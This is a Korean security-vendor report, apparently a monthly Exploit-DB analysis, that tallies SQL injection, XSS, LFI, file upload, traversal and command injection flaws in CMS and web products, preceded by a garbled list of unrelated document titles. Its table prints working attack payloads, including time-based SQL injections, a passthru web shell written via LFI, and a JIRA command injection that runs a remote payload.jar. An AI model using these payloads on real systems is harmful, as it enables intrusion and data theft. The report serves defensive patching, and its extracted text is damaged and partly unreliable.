날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

Inhalt01_Teil1

?

Ç¥Áö

1 01 [ ] [ ] plus 002

12¿ù 1~30

105È£4fš

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

3월-기획특집1-4

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

제목 레이아웃

ps

untitled

³»Áö¼öÁ¤

PowerPoint プレゼンテーション

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

슬라이드 1

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

untitled

1

?

초보자를 위한 ADO 21일 완성

µµÅ¥¸àÆ®1

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36


PowerPoint Template

3장

Assign an IP Address and Access the Video Stream - Installation Guide

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

3ÆÄÆ®-14

1217 WebTrafMon II

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Secure Programming Lecture1 : Introduction

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

초보자를 위한 C++

특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터(

vm-웨어-01장


XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

<49534F C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770>

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

PCServerMgmt7

Microsoft Word - KSR2014S042

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

?

User's Guide Manual

歯Phone

초보자를 위한 ASP.NET 21일 완성

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

PRO1_04E [읽기 전용]

Portal_9iAS.ppt [읽기 전용]

thesis

ibmdw_rest_v1.0.ppt


!K_InDesginCS_NFH

0125_ 워크샵 발표자료_완성.key


Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

RUCK2015_Gruter_public

rmi_박준용_final.PDF

untitled

untitled

게시판 스팸 실시간 차단 시스템

라즈베리파이 프로그래밍_130912(최종).indd

Sena Device Server Serial/IP TM Version

PowerPoint

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

0. 들어가기 전

MVVM 패턴의 이해

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우

uFOCS

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate


본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

NCS : ERP(SAP) ERP(SAP) SW IT,. SW IT 01., 05., 06., 08., 15., , 05. SW IT,,,, SAP HR,,, 4,,, SAP ABAP HR SCHEMA, BSP,

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

*****

Microsoft Word - junior.docx

Solaris Express Developer Edition

EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code

05Àå

Transcription:

EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가다른취약점과비교하여유난히많았습니다. 세계적으로가장많이사용되고있는 CMS 인 WordPress, 다음으로많이쓰인다고알려진 에서이 SQL Injection 에취약한모습을보여주고있습니다. 내에서는물론특정 에서해당취약점이많이발생되고있으므로 를사용한다면신속히보안패치를적용하여대응하실수있습니다. 다음으로 CMS 에서도역시 SQL Injection 에취약한모습을보이고있습니다. 분석된공격중에는특정파라미터키의배열을조작하여공격에성공하는, 일반적인공격패턴이아닌공격도포함되어있었습니다. 취약점이발견된페이지가관리자페이지로예되므로관련보안패치가나오기전까지해당소스코드의빠른수정이요구됩니다.. 취약점별보고개수취약점 보고개수 Command Injection Directory Traversal File Upload LFI XSS 3 SQL Injection 5 총합계 3 6 4 0 8 6 4 취약점별보고개수 3 5 0 Command Injection Directory Traversal File Upload LFI XSS SQL Injection. 위험도별분류위험도 보고개수 백분율 8 34.78% 중 5 65.% 합계 3 00.00% 위험도별분류 8 5 중 3. 공격난이도별현황공격난이도 보고개수 백분율 7 30.43% 중 7 30.43% 하 9 39.3% 총합계 3 00.00% 9 공격난이도별현황 7 중 하 7 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 9 4 ManageEngine ElasticSearch Kerio JIRA Oxwall Dream 총합계 3 주요소프트웨어별취약점발생현황 9 ManageEngine ElasticSearch Kerio JIRA Oxwall Dream 4 ** 5개이발생한주요소프트웨어별취약점세 EDB 번호 취약점종류 공격난이도 공격위험도 취약점이름 소프트웨어이름 38445 SQL Injection Real Estate Manager 3.7 - index.php 3858 XSS 하 중 - index.php XSS 취약점 3857 SQL Injection 하 중 - index.php () 3857 SQL Injection 하 중 - index.php () 3857 SQL Injection 하 중 - index.php (3) 38534 SQL Injection 3..x - 3.4.4 - index.php 38565 SQL Injection 중 중 oomla JNews 8.5. - index.php () 38565 SQL Injection 중 oomla JNews 8.5. - index.php () 38565 SQL Injection 중 중 oomla JNews 8.5. - index.php (3)

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-0 38383 Directory Traversal 하 EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. ElasticSearch.6.0 - Directory Traversal 취약점 /_snapshot/pwn/evl/../../../../../../../../ ElasticSearch ElasticSearch.6.0 05-0-05 38395 LFI 중 ManageEngine ServiceDesk Plus - FileDownload.jsp LFI 취약점 /workorder/filedownload.jsp?module=support&fname=.. ManageEngin %f..%f..%f..%f..%f..%f..%fwindows%fwin.in e i%00 ManageEngin e ServiceDesk Plus <= 9. 05-0-06 38406 SQL Injection 중중 <= v7.0.07 - /phpfusion/files/administration/members.php?aid=99ad64 members.php SQL Injection 취약 700ec4ce0&sortby=all&status=0' 점 AND substr(@@version,,)='5 <= v7.0.07 05-0-07 384 XSS 하중 Management Interface 4.3.7 - / XSS 취약점 POST / HTTP/. Management Interface 4.3.7 title:utf-8:string=</title><script>alert('xss by hyp3rlinx 083005')</script>&manage_editProperties:method=Sav e Changes 05-0- 38446 File Upload 하중 Dream CMS.3.0 - /pages/en/files-manageradministration/add-file File Upload 취약점 POST /pages/en/files-manager-administration/addfile?path=home HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f Dream Dream CMS.3.0 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="billy.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-0- 38445 SQL Injection POST /index.php?option=com_realestatemanager&task=showca tegory&catid=50&itemid=3 HTTP/. Real Estate Manager 3.7 - index.php SQL Injection 취약점 Real Estate Manager 3.7 order_direction=asc,(select (CASE WHEN (798=798) THEN ELSE 798*(SELECT 798 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order_field=price 05-0-3 38450 SQL Injection 중중 Kerio Control <= 8.6. - report.php /report.php?id='+or+''%3d''%3b+-- Kerio Kerio Control <= 8.6. 05-0-9 38497 SQL Injection 중중 4.0. - users.php /admin/users.php?req=remove&u_id=03%0and%0(se lect%0*%0from%0(select(sleep(66)))a)--%0& 4.0. 05-0-9 38497 SQL Injection 중중 4.0. - mailer.php POST /admin/mailer.php HTTP/. 4.0. agent[]=0 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=send POST /administrator/index.php HTTP/. 05-0-3 3858 XSS 하중 - index.php XSS 취약점 option=com_rpl&view=location_manager&format=ajax&ne w_location_en_gb=%onmousemove%3d%alert()% %&new_location_fr_fr=&level=&parent=&function=ad d_location

EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-3 3857 SQL Injection 하중 - index.php SQL Injection 취약점 () POST /administrator/index.php HTTP/. option=com_rpl&view=addon_membership_members&for mat=edit&id=84' and =-- 05-0-3 3857 SQL Injection 하중 - index.php SQL Injection 취약점 () POST /administrator/index.php HTTP/. option=com_rpl&view=rpl_multilingual&format=ajax&func tion=data_copy&copy_field=308' and =-- &copy_from=&copy_to=en_gb&copy_method= 05-0-3 3857 SQL Injection 하중 - index.php SQL Injection 취약점 (3) POST /administrator/index.php HTTP/. option=com_rpl&view=property_structure&format=ajax&f unction=update_field&id=300&options=0&css=&tip=&st yle=&name=&cat_id=&text_search=0&plisting=0&pshow =' and =--&pwizard=&mode=add 05-0-6 38534 SQL Injection 3..x - 3.4.4 - index.php /index.php?option=com_contenthistory&view=history&list [ordering]=&item_id=75&type_id=&list[select]=(select+ +from+(select+count(*),+concat((select+(select+concat(p assword))+from+icalab_users+limit+0,),floor(rand(0)*) )x+from+information_schema.tables+group+by+x)a) 3..x - 3.4.4 POST /rest/hipchat/integrations/.0/message/render/ HTTP/. 05-0-8 3855 Command Injection JIRA and HipChat for JIRA Plugin - /rest/hipchat/integrations/.0/m essage/render/ Command injection 취약점 Content-Type: application/json { "message": " $i8n.getclass().forname(\'java.lang.runtime\').getmethod (\'getruntime\', null).invoke(nㅌ ull, null).exec(\'' + java -jar \\\\9.68..34\\public\\payload.jar + '\').waitfor() " } JIRA JIRA product versions: 6.3.5 <= version < 6.4. 05-0-9 38565 SQL Injection 중중 oomla JNews 8.5. - index.php () POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf&email=asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]= RLIKE (SELECT (CASE WHEN (7097=7097) THEN ELSE 0x8 END))&acc_level[]=9&passwordA=0oYmqypNqP6eU&fr omfrontend=&act=subscribe&subscriber_id=0&user_id= 0&option=com_jnews&task=save&boxchecked=0&Itemid= 88&d65abd4ca0e4f5d3e5af6b5c390ae7= JNews 8.5.

EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-9 38565 SQL Injection 중 oomla JNews 8.5. - index.php () POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf&email=asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]= AND EXTRACTVALUE(8483,CONCAT(0x5c,0x76b78767,(SEL ECT (ELT(8483=8483,))),0x76b786b7))&acc_level[]=9& passworda=0oymqypnqp6eu&fromfrontend=&act=subs cribe&subscriber_id=0&user_id=0&option=com_jnews&tas k=save&boxchecked=0&itemid=88&d65abd4ca0e4f5d3 e5af6b5c390ae7= JNews 8.5. 05-0-9 38565 SQL Injection 중중 oomla JNews 8.5. - index.php (3) POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf&email=asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]=(SELECT * FROM (SELECT(SLEEP(5)))Qrax)&acc_level[]=9&passwordA=0 oymqypnqp6eu&fromfrontend=&act=subscribe&subscri ber_id=0&user_id=0&option=com_jnews&task=save&boxc hecked=0&itemid=88&d65abd4ca0e4f5d3e5af6b5c390 ae7= JNews 8.5. 05-0-30 3858 XSS 하중 Oxwall.7.4 - /admin/pages/maintenance XSS 취약점 POST /admin/pages/maintenance HTTP/. Oxwall Oxwall.7.4 form_name=maintenance&maintenance_enable=on&save =Save&maintenance_text=<script>alert('ImmuniWeb');</sc ript> 05-0-30 38579 LFI 하중 CMS - admin_editor.php LFI 취약점 POST /pligg-cms-master/admin/admin_editor.php HTTP/. CMS the_file=..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%fvar%fwww%fhtml%fpligg-cmsmaster%f404.php&updatedfile=<?php passthru($_get['x']);?>&isempty=&save=save+changes 05-0-30 38577 SQL Injection CMS - story.php SQL Injection 취약점 /pligg-cms-master/story.php?title=googleblabla&reply=&comment_id=%0union%0all%0sele ct%0,,,,,,,password,password,%0from%0m ysql.user%0%3 CMS POST /pligg-cms-master/admin/admin_users.php HTTP/. 05-0-30 38577 SQL Injection CMS - admin_users.php SQL Injection 취약점 CMS frmsubmit=userlist&admin_acction=&token=valid_csrf_ TOKEN&all=on&enabled[ AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK(500000000,version()),null) %3]=

EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-30 38577 SQL Injection CMS - upload.php POST /pligg-cms-master/modules/upload/upload.php HTTP/. CMS id=&number=&comment=' AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK(500000000,version()),null) %3